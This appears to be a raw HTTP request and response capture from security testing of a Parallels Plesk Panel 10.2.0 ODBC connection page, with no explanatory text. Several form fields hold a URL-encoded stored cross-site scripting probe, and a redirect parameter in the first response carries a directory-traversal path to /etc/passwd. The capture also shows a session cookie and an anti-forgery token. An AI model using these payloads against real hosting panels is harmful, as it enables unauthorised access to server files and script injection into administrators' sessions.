<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fcertificate%2540%2Froot..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fmpc-certificates%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Set Up an ODBC Connection</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/odbc_connection_config_mssql/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/odbc/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;
var required = new Array('DRIVER', 'SERVER', 'UID', 'PWD');

function chk_fields(f) {

   // scan form for input fields
   for (i=0; i<f.elements.length; i++) {

       if ((f.elements[i].type == 'text' || f.elements[i].type == 'password') && f.elements[i].value == '') {

           // find if this variable is required or not
           req = false;
           for (j=0; j<required.length; j++) {
               if (f.elements[i].name == required[j]) {
                   req = 1;
                   break;
               }
           }

           if (req) {

               // required elements should be set
               alert("Required parameters are not supplied.");
               f.elements[i].focus();
               f.elements[i].select();
               return false;

           } else {

               // don't submit empty not required variables
               f.elements[i].disabled = true;
           }
       }
   }
   return true;
}

function check_data(f) { if (chk_fields(f)) { f.cmd.value = 'check'; lsubmit(f); } }
function update_data(f) { if (chk_fields(f)) { f.cmd.value = 'update'; lsubmit(f); } }
function test_connection(f) { if (chk_fields(f)) { f.cmd.value = 'test'; lsubmit(f); } }
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"><DIV class="msg-box msg-error"><DIV><DIV><DIV><DIV><DIV><DIV class="msg-content"><SPAN class="title">Error:&nbsp;</SPAN>Unable to connect to the data source using the defined settings. Server has returned the following error: <br />
ODBCError 28000: [Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user &#039;C332904E1C524819CF332904E&#039;.</DIV></DIV></DIV></DIV></DIV></DIV></DIV></div>


<form action="/plesk/client@2/domain@1/odbc/dsn@1/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

<legend>Settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">


<tr>
   <td class="name">[DRIVER] &nbsp;Driver</td>
   <td>SQL Server<input type="hidden" name="DRIVER" value="SQL Server"></td>
</tr>

<tr>
   <td class="name">[SERVER] &nbsp;<span class="required">*</span>&nbsp;Server</td>
   <td><input type="text" name="SERVER" value="(local)" ></td>
</tr>

<tr>
   <td class="name">[UID] &nbsp;<span class="required">*</span>&nbsp;Login ID</td>
   <td><input type="text" name="UID" value="%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E" ></td>
</tr>

<tr>
   <td class="name">[PWD] &nbsp;<span class="required">*</span>&nbsp;Password</td>
   <td><input type="password" name="PWD" value="%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E" ></td>
</tr>

<tr>
   <td class="name">[DATABASE] &nbsp;&nbsp;Default database for the ODBC data source</td>
   <td><input type="text" name="DATABASE" value="%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E" ></td>
</tr>

<tr>
   <td class="name">[APP] &nbsp;&nbsp;Application name</td>
   <td><input type="text" name="APP" value="%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E" ></td>
</tr>

<tr>
   <td class="name">[WSID] &nbsp;&nbsp;Workstation ID</td>
   <td><input type="text" name="WSID" value="" ></td>
</tr>

<tr>
   <td class="name">[LANGUAGE] &nbsp;&nbsp;Default national language to use</td>
   <td><select name="LANGUAGE" id="fid-LANGUAGE" >    <option value='' SELECTED></option>
   <option value='Arabic'>Arabic</option>
   <option value='Brazilian'>Brazilian</option>
   <option value='British English'>British English</option>
   <option value='Bulgarian'>Bulgarian</option>
   <option value='Croatian'>Croatian</option>
   <option value='Czech'>Czech</option>
   <option value='Danish'>Danish</option>
   <option value='Dansk'>Dansk</option>
   <option value='Deutsch'>Deutsch</option>
   <option value='Dutch'>Dutch</option>
   <option value='English'>English</option>
   <option value='Estonian'>Estonian</option>
   <option value='Finnish'>Finnish</option>
   <option value='French'>French</option>
   <option value='German'>German</option>
   <option value='Greek'>Greek</option>
   <option value='Hungarian'>Hungarian</option>
   <option value='Italian'>Italian</option>
   <option value='Japanese'>Japanese</option>
   <option value='Korean'>Korean</option>
   <option value='Latvian'>Latvian</option>
   <option value='Lithuanian'>Lithuanian</option>
   <option value='Magyar'>Magyar</option>
   <option value='Nederlands'>Nederlands</option>
   <option value='Norwegian'>Norwegian</option>
   <option value='Polish'>Polish</option>
   <option value='Portuguese'>Portuguese</option>
   <option value='Romanian'>Romanian</option>
   <option value='Russian'>Russian</option>
   <option value='Simplified Chinese'>Simplified Chinese</option>
   <option value='Slovak'>Slovak</option>
   <option value='Slovenian'>Slovenian</option>
   <option value='Spanish'>Spanish</option>
   <option value='Suomi'>Suomi</option>
   <option value='Svenska'>Svenska</option>
   <option value='Swedish'>Swedish</option>
   <option value='Thai'>Thai</option>
   <option value='Traditional Chinese'>Traditional Chinese</option>
   <option value='Turkish'>Turkish</option>
   <option value='Us_english'>Us_english</option>
</select>
</td>
</tr>

<tr>
   <td class="name">[OEMTOANSI] &nbsp;&nbsp;Conversion of extended characters to OEM values</td>
   <td><select name="OEMTOANSI" id="fid-OEMTOANSI" >    <option value='' SELECTED></option>
   <option value='437 code page'>437 code page</option>
   <option value='850 code page'>850 code page</option>
   <option value='ISO 8859-1'>ISO 8859-1</option>
</select>
</td>
</tr>














</table>



</td></tr></table></fieldset>

   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-next" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Check the currently defined settings.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);check_data(document.forms[0]);;return false;" style=""><BUTTON name="bname_next" id="buttonid-next" type="button" onClick="Event.stop(event);check_data(document.forms[0]);;return false;">Next &gt;&gt;</BUTTON><SPAN id="spanid-next">Next &gt;&gt;</SPAN></DIV>&nbsp;<SPAN class="commonButton" id="bid-finish-disabled" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;This feature is currently unavailable.&quot;&#125;]);" onMouseOut="tooltip.hide();" style=""><BUTTON name="bname_finish" disabled id="buttonid-finish-disabled" type="button">Finish</BUTTON><SPAN id="spanid-finish-disabled">Finish</SPAN></SPAN>&nbsp;<DIV class="commonButton" id="bid-test" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Try to connect to the data source with current parameters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);test_connection(document.forms[0]);;return false;" style=""><BUTTON name="bname_test" id="buttonid-test" type="button" onClick="Event.stop(event);test_connection(document.forms[0]);;return false;">Test Connection</BUTTON><SPAN id="spanid-test">Test Connection</SPAN></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/&#039;); 
return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

Request 2

GET /plesk/client@2/domain@1/odbc/dsn@1/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/odbc/dsn@new/properties/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dsnlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response 2

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:32:23 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:32:23 GMT
Connection: close
Content-Length: 18067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Set Up an ODBC Connection</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/odbc_connection_config_mssql/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/odbc/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;
var required = new Array('DRIVER', 'SERVER', 'UID', 'PWD');

function chk_fields(f) {

   // scan form for input fields
   for (i=0; i<f.elements.length; i++) {

       if ((f.elements[i].type == 'text' || f.elements[i].type == 'password') && f.elements[i].value == '') {

           // find if this variable is required or not
           req = false;
           for (j=0; j<required.length; j++) {
               if (f.elements[i].name == required[j]) {
                   req = 1;
                   break;
               }
           }

           if (req) {

               // required elements should be set
               alert("Required parameters are not supplied.");
               f.elements[i].focus();
               f.elements[i].select();
               return false;

           } else {

               // don't submit empty not required variables
               f.elements[i].disabled = true;
           }
       }
   }
   return true;
}

function check_data(f) { if (chk_fields(f)) { f.cmd.value = 'check'; lsubmit(f); } }
function update_data(f) { if (chk_fields(f)) { f.cmd.value = 'update'; lsubmit(f); } }
function test_connection(f) { if (chk_fields(f)) { f.cmd.value = 'test'; lsubmit(f); } }
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [{"componentType":"Jsw.Pathbar.Item","title":"ODBC data sources","href":"\/plesk\/client@2\/domain@1\/odbc\/"}]
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/odbc/dsn@1/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

<legend>Settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">


<tr>
   <td class="name">[DRIVER] &nbsp;Driver</td>
   <td>SQL Server<input type="hidden" name="DRIVER" value="SQL Server"></td>
</tr>

<tr>
   <td class="name">[SERVER] &nbsp;<span class="required">*</span>&nbsp;Server</td>
   <td><input type="text" name="SERVER" value="(local)" ></td>
</tr>

<tr>
   <td class="name">[UID] &nbsp;<span class="required">*</span>&nbsp;Login ID</td>
   <td><input type="text" name="UID" value="%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E" ></td>
</tr>

<tr>
   <td class="name">[PWD] &nbsp;<span class="required">*</span>&nbsp;Password</td>
   <td><input type="password" name="PWD" value="%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E" ></td>
</tr>

<tr>
   <td class="name">[DATABASE] &nbsp;&nbsp;Default database for the ODBC data source</td>
   <td><input type="text" name="DATABASE" value="%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E" ></td>
</tr>

<tr>
   <td class="name">[APP] &nbsp;&nbsp;Application name</td>
   <td><input type="text" name="APP" value="%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E" ></td>
</tr>

<tr>
   <td class="name">[WSID] &nbsp;&nbsp;Workstation ID</td>
   <td><input type="text" name="WSID" value="" ></td>
</tr>

<tr>
   <td class="name">[LANGUAGE] &nbsp;&nbsp;Default national language to use</td>
   <td><select name="LANGUAGE" id="fid-LANGUAGE" >    <option value='' SELECTED></option>
   <option value='Arabic'>Arabic</option>
   <option value='Brazilian'>Brazilian</option>
   <option value='British English'>British English</option>
   <option value='Bulgarian'>Bulgarian</option>
   <option value='Croatian'>Croatian</option>
   <option value='Czech'>Czech</option>
   <option value='Danish'>Danish</option>
   <option value='Dansk'>Dansk</option>
   <option value='Deutsch'>Deutsch</option>
   <option value='Dutch'>Dutch</option>
   <option value='English'>English</option>
   <option value='Estonian'>Estonian</option>
   <option value='Finnish'>Finnish</option>
   <option value='French'>French</option>
   <option value='German'>German</option>
   <option value='Greek'>Greek</option>
   <option value='Hungarian'>Hungarian</option>
   <option value='Italian'>Italian</option>
   <option value='Japanese'>Japanese</option>
   <option value='Korean'>Korean</option>
   <option value='Latvian'>Latvian</option>
   <option value='Lithuanian'>Lithuanian</option>
   <option value='Magyar'>Magyar</option>
   <option value='Nederlands'>Nederlands</option>
   <option value='Norwegian'>Norwegian</option>
   <option value='Polish'>Polish</option>
   <option value='Portuguese'>Portuguese</option>
   <option value='Romanian'>Romanian</option>
   <option value='Russian'>Russian</option>
   <option value='Simplified Chinese'>Simplified Chinese</option>
   <option value='Slovak'>Slovak</option>
   <option value='Slovenian'>Slovenian</option>
   <option value='Spanish'>Spanish</option>
   <option value='Suomi'>Suomi</option>
   <option value='Svenska'>Svenska</option>
   <option value='Swedish'>Swedish</option>
   <option value='Thai'>Thai</option>
   <option value='Traditional Chinese'>Traditional Chinese</option>
   <option value='Turkish'>Turkish</option>
   <option value='Us_english'>Us_english</option>
</select>
</td>
</tr>

<tr>
   <td class="name">[OEMTOANSI] &nbsp;&nbsp;Conversion of extended characters to OEM values</td>
   <td><select name="OEMTOANSI" id="fid-OEMTOANSI" >    <option value='' SELECTED></option>
   <option value='437 code page'>437 code page</option>
   <option value='850 code page'>850 code page</option>
   <option value='ISO 8859-1'>ISO 8859-1</option>
</select>
</td>
</tr>














</table>



</td></tr></table></fieldset>

   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-next" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Check the currently defined settings.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);check_data(document.forms[0]);;return false;" style=""><BUTTON name="bname_next" id="buttonid-next" type="button" onClick="Event.stop(event);check_data(document.forms[0]);;return false;">Next &gt;&gt;</BUTTON><SPAN id="spanid-next">Next &gt;&gt;</SPAN></DIV>&nbsp;<SPAN class="commonButton" id="bid-finish-disabled" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;This feature is currently unavailable.&quot;&#125;]);" onMouseOut="tooltip.hide();" style=""><BUTTON name="bname_finish" disabled id="buttonid-finish-disabled" type="button">Finish</BUTTON><SPAN id="spanid-finish-disabled">Finish</SPAN></SPAN>&nbsp;<DIV class="commonButton" id="bid-test" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Try to connect to the data source with current parameters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);test_connection(document.forms[0]);;return false;" style=""><BUTTON name="bname_test" id="buttonid-test" type="button" onClick="Event.stop(event);test_connection(document.forms[0]);;return false;">Test Connection</BUTTON><SPAN id="spanid-test">Test Connection</SPAN></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/&#039;); 
return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
